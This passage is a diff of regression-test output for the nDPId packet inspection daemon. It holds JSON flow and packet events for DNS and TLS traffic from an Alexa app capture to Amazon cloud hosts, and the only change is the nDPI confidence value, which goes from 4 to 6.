00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1490976090796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1490976090796,"pkt":"AMDKkaPvePiC0\/vCCABFAABJWlpAAEARM1CsECrYrBAqAYuOADUANbcep0QBAAABAAAAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQAB"} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1490976090982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1490976090982,"pkt":"ePiC0\/vCAMDKkaPvCABFAAB13VlAAEARsCSsECoBrBAq2AA1i44AYd1op0SBgAABAAIAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQABwAwABQABAAAADgAQDXMzLWV4dGVybmFsLTHAGsA5AAEAAQAAAAQABDbnSFg="} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}} 
+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 
+00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1490976093238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976093238,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWltAAEARM1SsECrYrBAqAaKnADUAMOTtwQkBAAABAAAAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAQ=="} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1490976093355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976093355,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr3WJAAEARsCWsECoBrBAq2AA1oqcAV3huwQmBgAABAAIAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAIQACwhkcC1ndy1uYcAYwDQAAQABAAAAFAAEsCBlNA=="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
